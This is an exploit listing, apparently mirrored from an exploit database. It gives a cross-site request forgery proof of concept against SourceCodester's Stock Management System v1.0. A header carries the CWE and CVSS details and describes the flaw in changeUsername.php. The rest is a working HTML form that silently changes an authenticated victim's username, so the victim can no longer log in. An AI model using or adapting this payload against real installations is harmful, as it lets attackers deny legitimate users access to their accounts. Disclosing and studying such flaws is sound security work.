Share
## https://sploitus.com/exploit?id=PACKETSTORM:158718
# Exploit Title: Stock Management System v1.0 - Cross-Site Request Forgery (Change Username)  
# Exploit Author: Bobby Cooke  
# Date: 2020-08-01  
# Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip  
# Version: 1.0  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6  
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H  
# Tested On: Windows 10 Pro + XAMPP | Python 2.7  
# Vulnerability Description:  
# Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters   
# Stock Management System v1.0 allows remote attackers to deny future logins via changing the   
# authenticated victims username when they visit a third-party site.  
  
<html>  
<body>  
<form action="http://172.16.65.130/stock/php_action/changeUsername.php" method="POST">  
<input type="hidden" name="username" value="BOKU" />  
<input type="hidden" name="user_id" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>